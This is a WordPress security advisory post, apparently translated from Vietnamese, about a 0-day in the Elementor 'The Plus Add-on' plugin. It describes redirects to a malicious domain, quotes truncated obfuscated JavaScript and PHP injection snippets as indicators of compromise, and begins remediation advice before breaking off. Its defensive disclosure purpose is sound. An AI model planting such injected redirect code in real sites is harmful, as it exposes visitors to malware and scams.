{"id":18268,"date":"2026-07-03T13:52:49","date_gmt":"2026-07-03T06:52:49","guid":{"rendered":"https:\/\/www.chantroituonglai.com\/wordpress-security-note-the-plus-add-on-0-day-attack.html"},"modified":"2026-08-01T15:12:35","modified_gmt":"2026-08-01T08:12:35","slug":"wordpress-security-note-serious-security-error-of-elementor-the-plus-add-on-plugin-update-fixed-from-version-4-1-7","status":"publish","type":"post","link":"https:\/\/www.chantroituonglai.com\/en\/wordpress-security-note-serious-security-error-of-elementor-the-plus-add-on-plugin-update-fixed-from-version-4-1-7.html","title":{"rendered":"WordPress Security Note: Serious security error of Elementor The Plus Add-on plugin (Update: Fixed from version 4.1.7)"},"content":{"rendered":"\n<p>Report from the Plugin development team: <a class=\"rank-math-link\" href=\"https:\/\/theplusaddons.com\/elementor-news\/critical-0-day-the-plus-add-ons-vulnerability-fixed-in-48-hours\/\" rel=\"nofollow noopener\" target=\"_blank\">Critical 0-Day The Plus Add-Ons Vulnerability Fixed Under 48 Hours<\/a><\/p>\n\n\n<p>Currently, WordPress websites that are using the Elementor The Plus Add-on plugin Pro version (The paid version is not currently affected), need to immediately update to update 4.1.7 (Download here <em><a class=\"rank-math-link\" href=\"https:\/\/store.posimyth.com\/\" rel=\"nofollow noopener\" target=\"_blank\">This<\/a><\/em>).<\/p>\n\n\n<p>According to reports from developers on the WordPress platform, this security error is being exploited to directly attack WordPress websites: Redirect and Database malware. <\/p>\n\n wp:table-of-contents-block\/table-of-contents-block {&#8220;headers&#8221;:[{&#8220;level&#8221;:2,&#8221;content&#8221;:&#8221;I. Description of attack method&#8221;,&#8221;text&#8221;:&#8221;I. Description of attack method&#8221;,&#8221;link&#8221;:&#8221;i-description-of-attack-method&#8221;},{&#8220;level&#8221;:3,&#8221;content&#8221;:&#8221;1. Status: \\u003cstrong\\u003eWebsite automatically switches direction when accessing\\u003c\/strong\\u003e&#8221;,&#8221;text&#8221;:&#8221;1. Status: Website automatically redirects when accessing&#8221;,&#8221;link&#8221;:&#8221;1-status-website-automatically-redirects-when-accessed&#8221;},{&#8220;level&#8221;:3,&#8221;content&#8221;:&#8221;2. Malicious code in the source file of the website&#8221;,&#8221;text&#8221;:&#8221;2 website&#8221;,&#8221;link&#8221;:&#8221;2-malicious-code-in-source-file-of-website&#8221;},{&#8220;level&#8221;:3,&#8221;content&#8221;:&#8221;3. Malicious code in the website's database&#8221;,&#8221;link&#8221;:&#8221;3-malicious-code-in-the-website-database&#8221;},{&#8220;level&#8221;:2,&#8221;content&#8221;:&#8221;II. How to handle&#8221;,&#8221;text&#8221;:&#8221;II handle&#8221;,&#8221;link&#8221;:&#8221;ii-how-to-handle&#8221;},{&#8220;level&#8221;:4,&#8221;content&#8221;:&#8221;The first thing you need to check is the Elementor The Plus Add-on Plugin version and update to the latest version as soon as possible.&#8221;,&#8221;text&#8221;:&#8221;The first thing you need to check is the Elementor The Plus Add-on Plugin version and update to the latest version as soon as possible.&#8221; good.&#8221;,&#8221;link&#8221;:&#8221;first-thing-you-need-to-check-the-plugin-elementor-the-plus-add-on-version-and-update-to-the-latest-version-as-soon-as-possible&#8221;},{&#8220;level&#8221;:4,&#8221;content&#8221;:&#8221;STOPS TO HANDLE WHEN THE WEBSITE HAS BEEN INFECTED WITH MALICIOUS CODE (FROM 3-5 DAYS)&#8221;,,&#8221;text&#8221;:&#8221;STEP TREATMENT WHEN THE WEBSITE IS INFECTED WITH MALICIOUS CODE (FROM 3-5 DATE)&#8221;,&#8221;link&#8221;:&#8221;steps-to-handle-when-a-website-has-been-infected-with-malicious-code-from-3-5-days&#8221;}],&#8221;visibleHeaders&#8221;:[false,true,true,true,true,false],&#8221;title&#8221;:&#8221;CONTENT MAIN&#8221;,&#8221;titleBg&#8221;:&#8221;rgba(0,0,0,1)&#8221;,&#8221;contentBg&#8221;:&#8221;rgba(255,255,255,1)&#8221;,&#8221;contentColor&#8221;:&#8221;rgba(0,0,0,1)&#8221;,&#8221;contentHoverColor&#8221;:&#8221;rgba(73,181,249,1 )&#8221;,&#8221;contentGap&#8221;:15,&#8221;indent&#8221;:0,&#8221;contentFontSize&#8221;:17,&#8221;contentFontWeight&#8221;:&#8221;bold&#8221;,&#8221;contentTextTransform&#8221;:&#8221;uppercase&#8221;,&#8221;contentPaddingTop&#8221;:10} \n<div class=\"wp-block-table-of-contents-block-table-of-contents-block eb-toc-container\" data-collapsible=\"false\" data-hide-mobile=\"false\" data-hover-color=\"rgba(73,181,249,1)\" data-initial-collapse=\"false\" data-scroll-top=\"false\" data-sticky=\"false\" data-text-color=\"rgba(0,0,0,1)\" data-title-bg=\"rgba(0,0,0,1)\" data-title-color=\"white\" style=\"border:undefinedpx solid black;box-shadow:0px 0px 0px 0px black;width:100%\"><div class=\"eb-toc-header\"><div class=\"eb-toc-title\" style=\"font-size:22px;font-weight:normal;letter-spacing:undefinedpx;line-height:undefinedpx;text-align:left;cursor:default;color:white;border-bottom:none;padding:0px 0px 0px 10px\">MAIN CONTENTS<\/div><\/div>&lt;div class=&#8221;eb-toc-wrapper&#8221; style=&#8221;text-align:left;color:rgba(0,0,0,1);background:rgba(255,255,255,1);padding:10px 0px 0px 0px&#8221; data-headers=&#8221;[{&#8220;level&#8221;:2,&#8221;content&#8221;:&#8221;I. Description of attack method&#8221;,&#8221;text&#8221;:&#8221;I. Description of attack method&#8221;,&#8221;link&#8221;:&#8221;i-description-of-attack-method&#8221;},{&#8220;level&#8221;:3,&#8221;content&#8221;:&#8221;1. Status: &lt;strong&gt;Website redirects automatically when accessed<div class=\"eb-toc__list-wrap\"><ul class=\"eb-toc__list\" style=\"margin-left:0\"><li style=\"font-size:17px;font-weight:bold;letter-spacing:undefinedpx;line-height:1.4;text-transform:uppercase;padding-top:false;padding-bottom:7.5px;border-bottom:undefinedpx none undefined\"><a href=\"#i-m\u00f4-t\u1ea3-ph\u01b0\u01a1ng-th\u1ee9c-t\u1ea5n-c\u00f4ng\" style=\"text-decoration:none\">I. Description of attack method<\/a><\/li><ul class=\"eb-toc__list\" style=\"margin-left:0\"><li style=\"font-size:17px;font-weight:bold;letter-spacing:undefinedpx;line-height:1.4;text-transform:uppercase;padding-top:7.5px;padding-bottom:7.5px;border-bottom:undefinedpx none undefined\"><a href=\"#1-t\u00ecnh-tr\u1ea1ng-website-t\u1ef1-chuy\u1ec3n-h\u01b0\u1edbng-khi-truy-c\u1eadp\" style=\"text-decoration:none\">1. Status: Website redirects automatically when accessed<\/a><\/li><li style=\"font-size:17px;font-weight:bold;letter-spacing:undefinedpx;line-height:1.4;text-transform:uppercase;padding-top:7.5px;padding-bottom:7.5px;border-bottom:undefinedpx none undefined\"><a href=\"#2-m\u00e3-\u0111\u1ed9c-trong-file-ngu\u1ed3n-c\u1ee7a-website\" style=\"text-decoration:none\">2. Malicious code in the source file of the website<\/a><\/li><li style=\"font-size:17px;font-weight:bold;letter-spacing:undefinedpx;line-height:1.4;text-transform:uppercase;padding-top:7.5px;padding-bottom:false;border-bottom:false\"><a href=\"#3-m\u00e3-\u0111\u1ed9c-trong-database-c\u1ee7a-website\" style=\"text-decoration:none\">3. Malicious code in the website's database<\/a><\/li><\/ul><li style=\"font-size:17px;font-weight:bold;letter-spacing:undefinedpx;line-height:1.4;text-transform:uppercase;padding-top:7.5px;padding-bottom:false;border-bottom:false\"><a href=\"#ii-c\u00e1ch-x\u1eed-l\u00fd\" style=\"text-decoration:none\">II. How to handle<\/a><\/li><ul class=\"eb-toc__list\" style=\"margin-left:0\"><li style=\"font-size:17px;font-weight:bold;letter-spacing:undefinedpx;line-height:1.4;text-transform:uppercase;padding-top:7.5px;padding-bottom:false;border-bottom:false\"><a href=\"#vi\u1ec7c-tr\u01b0\u1edbc-ti\u00ean-c\u00e1c-b\u1ea1n-c\u1ea7n-ki\u1ec3m-tra-phi\u00ean-b\u1ea3n-plugin-elementor-the-plus-add-on-v\u00e0-c\u1eadp-nh\u1eadt-l\u00ean-phi\u00ean-b\u1ea3n-m\u1edbi-nh\u1ea5t-c\u00e0ng-s\u1edbm-c\u00e0ng-t\u1ed1t\" style=\"text-decoration:none\">The first thing you need to check is the Elementor The Plus Add-on Plugin version and update to the latest version as soon as possible.<\/a><\/li><li style=\"font-size:17px;font-weight:bold;letter-spacing:undefinedpx;line-height:1.4;text-transform:uppercase;padding-top:7.5px;padding-bottom:false;border-bottom:false\"><a href=\"#c\u00e1c-b\u01b0\u1edbc-x\u1eed-l\u00fd-khi-website-\u0111\u00e3-nhi\u1ec5m-m\u00e3-\u0111\u1ed9c-t\u1eeb-3-5-ng\u00e0y\" style=\"text-decoration:none\">STEPS TO HANDLE WHEN THE WEBSITE IS INFECTED WITH MALICIOUS CODE (FOR 3-5 DAYS)<\/a><\/li><\/ul><\/ul><\/div><\/div>\n<!-- \/wp:post-content -->\n<!-- wp:heading -->\n<h2>I. Description of attack method<\/h2>\n<!-- \/wp:heading -->\n<!-- wp:heading {\"level\":3} -->\n<h3>1. Status: <strong>Website redirects automatically when accessed<\/strong><\/h3>\n<!-- \/wp:heading -->\n<!-- wp:paragraph -->\n<p>Access to the attacked website will be redirected to the address: <em>*.dontkinhooot.tw\/walkers?id=*<\/em> on both the user interface and the wp-admin administration page.<\/p>\n<!-- \/wp:paragraph -->\n<!-- wp:image {\"id\":2828,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"380\" alt=\"\" class=\"wp-image-2828\" src=\"https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-1024x380.png\" title=\"-\" srcset=\"https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-1024x380.png 1024w, https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-300x111.png 300w, https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-768x285.png 768w, https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-450x167.png 450w, https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-780x290.png 780w, https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417.png 1406w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption><a class=\"rank-math-link\" href=\"https:\/\/www.reddit.com\/r\/Wordpress\/comments\/m23etn\/elementor_site_got_hacked_yesterday_plus_addons\/\" rel=\"nofollow noopener\" target=\"_blank\">Source Reddit<\/a><\/figcaption><\/figure>\n<!-- \/wp:image -->\n<!-- wp:paragraph -->\n<p>Users will receive the following notifications:<\/p>\n<!-- \/wp:paragraph -->\n<!-- wp:paragraph -->\n<p><em><strong>Note: Absolutely do not agree to any notifications to avoid infection with malicious code and Ransomeware.<\/strong><\/em><strong> <\/strong>(Images in the article were taken by experts and experienced technical team)<\/p>\n<!-- \/wp:paragraph -->\n<!-- wp:jetpack\/slideshow {\"ids\":[2829,2830,2831],\"sizeSlug\":\"full\"} -->\n<div class=\"wp-block-jetpack-slideshow aligncenter\" data-effect=\"slide\"><div class=\"wp-block-jetpack-slideshow_container swiper-container\"><ul class=\"wp-block-jetpack-slideshow_swiper-wrapper swiper-wrapper\"><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img decoding=\"async\" width=\"2808\" height=\"1782\" alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-2829\" data-id=\"2829\" src=\"https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-2.png\" title=\"-\" srcset=\"https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-2.png 2808w, https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-2-300x190.png 300w, https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-2-1024x650.png 1024w, https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-2-768x487.png 768w, https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-2-1536x975.png 1536w, https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-2-2048x1300.png 2048w, https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-2-450x286.png 450w, https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-2-780x495.png 780w, https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-2-1600x1015.png 1600w\" sizes=\"(max-width: 2808px) 100vw, 2808px\" \/><\/figure><\/li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img decoding=\"async\" width=\"2752\" height=\"1802\" alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-2830\" data-id=\"2830\" src=\"https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-3.png\" title=\"-\" srcset=\"https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-3.png 2752w, https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-3-300x196.png 300w, https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-3-1024x671.png 1024w, https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-3-768x503.png 768w, https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-3-1536x1006.png 1536w, https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-3-2048x1341.png 2048w, https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-3-450x295.png 450w, https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-3-780x511.png 780w, https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-3-1600x1048.png 1600w\" sizes=\"(max-width: 2752px) 100vw, 2752px\" \/><\/figure><\/li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img loading=\"lazy\" decoding=\"async\" width=\"2782\" height=\"1754\" alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-2831\" data-id=\"2831\" src=\"https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-4.png\" title=\"-\" srcset=\"https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-4.png 2782w, https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-4-300x189.png 300w, https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-4-1024x646.png 1024w, https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-4-768x484.png 768w, https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-4-1536x968.png 1536w, https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-4-2048x1291.png 2048w, https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-4-450x284.png 450w, https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-4-780x492.png 780w, https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-4-1600x1009.png 1600w\" sizes=\"(max-width: 2782px) 100vw, 2782px\" \/><\/figure><\/li><\/ul><a class=\"wp-block-jetpack-slideshow_button-prev swiper-button-prev swiper-button-white\" role=\"button\"><\/a><a class=\"wp-block-jetpack-slideshow_button-next swiper-button-next swiper-button-white\" role=\"button\"><\/a><a aria-label=\"Pause Slideshow\" class=\"wp-block-jetpack-slideshow_button-pause\" role=\"button\"><\/a><div class=\"wp-block-jetpack-slideshow_pagination swiper-pagination swiper-pagination-white\"><\/div><\/div><\/div>\n<!-- \/wp:jetpack\/slideshow -->\n<!-- wp:heading {\"level\":3} -->\n<h3>2. Malicious code in the source file of the website<\/h3>\n<!-- \/wp:heading -->\n<!-- wp:paragraph -->\n<p>Checking the source code of the infected website will see &#8220;strange codes&#8221; similar to the following:<\/p>\n<!-- \/wp:paragraph -->\n<!-- wp:paragraph -->\n<p>a) In all Javascript files (*.js)<\/p>\n<!-- \/wp:paragraph -->\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(***)); elem.type = String.fromCharCode(****)...<\/code><\/pre>\n<!-- \/wp:code -->\n<!-- wp:paragraph -->\n<p>Note about the 0-day error of the Elementor The Plus Add-on plugin, <strong>ALL *.JS FILES IN THE WEB SOURCE AND ALL SUB FOLDER INSIDE ARE INFECTED.<\/strong> <\/p>\n<!-- \/wp:paragraph -->\n<!-- wp:image {\"id\":2833,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"780\" alt=\"\" class=\"wp-image-2833\" src=\"https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-6-1024x780.png\" title=\"-\" srcset=\"https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-6-1024x780.png 1024w, https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-6-300x228.png 300w, https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-6-768x585.png 768w, https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-6-1536x1170.png 1536w, https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-6-2048x1560.png 2048w, https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-6-450x343.png 450w, https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-6-780x594.png 780w, https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-6-1600x1218.png 1600w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption>Javascript file is infected with malicious code<\/figcaption><\/figure>\n<!-- \/wp:image -->\n<!-- wp:paragraph -->\n<p><\/p>\n<!-- \/wp:paragraph -->\n<!-- wp:paragraph -->\n<p>b) In some PHP files<\/p>\n<!-- \/wp:paragraph -->\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>echo chr(60).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(32).chr(116).chr(121).chr(112).chr(101).chr(61).chr(39).chr(116).chr(101).chr(120).chr(116).chr(47).chr(106).chr(97).chr(118).chr(97).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(39).chr(32).chr(115).chr(114).chr(99).chr(61).chr(39).chr(104)....<\/code><\/pre>\n<!-- \/wp:code -->\n<!-- wp:image {\"id\":2832,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"781\" alt=\"\" class=\"wp-image-2832\" src=\"https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-5-1024x781.png\" title=\"-\" srcset=\"https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-5-1024x781.png 1024w, https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-5-300x229.png 300w, https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-5-768x586.png 768w, https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-5-1536x1172.png 1536w, https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-5-2048x1562.png 2048w, https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-5-450x343.png 450w, https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-5-780x595.png 780w, https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-5-1600x1220.png 1600w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption>PHP file is infected with malicious code<\/figcaption><\/figure>\n<!-- \/wp:image -->\n<!-- wp:heading {\"level\":3} -->\n<h3>3. Malicious code in the website's database<\/h3>\n<!-- \/wp:heading -->\n<!-- wp:paragraph -->\n<p>With this latest attack, Hackers not only changed the source code of files on the Host but also inserted redirection javascript code in all posts (Table wp_posts):<\/p>\n<!-- \/wp:paragraph -->\n<!-- wp:image {\"id\":2834,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"516\" alt=\"\" class=\"wp-image-2834\" src=\"https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-7-1024x516.png\" title=\"-\" srcset=\"https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-7-1024x516.png 1024w, https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-7-300x151.png 300w, https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-7-768x387.png 768w, https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-7-1536x774.png 1536w, https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-7-2048x1032.png 2048w, https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-7-450x227.png 450w, https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-7-780x393.png 780w, https:\/\/www.chantroituonglai.com\/wp-content\/uploads\/2021\/03\/wordpress-security-note-loi-bao-mat-nghiem-trong-cua-plugin-elementor-the-plus-add-on-update-da-fix-tu-ban-417-7-1600x807.png 1600w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<!-- \/wp:image -->\n<!-- wp:heading -->\n<h2>II. How to handle<\/h2>\n<!-- \/wp:heading -->\n<!-- wp:paragraph -->\n<p>Unfortunately, WordPress vulnerabilities exist. WordPress vulnerabilities can exist in your plugins, themes, and even the WordPress core. And since WordPress now powers nearly 40% of all websites, the task of understanding security vulnerabilities is even more important. Simply put: you must be vigilant about the security of your website. <\/p>\n<!-- \/wp:paragraph -->\n<!-- wp:heading {\"level\":4} -->\n<h4>The first thing you need to check is the Elementor The Plus Add-on Plugin version and update to the latest version as soon as possible.<\/h4>\n<!-- \/wp:heading -->\n<!-- wp:paragraph -->\n<p>If the website is inaccessible due to an attack (Most websites that are attacked for 3-5 days or more are completely inaccessible to the admin page), 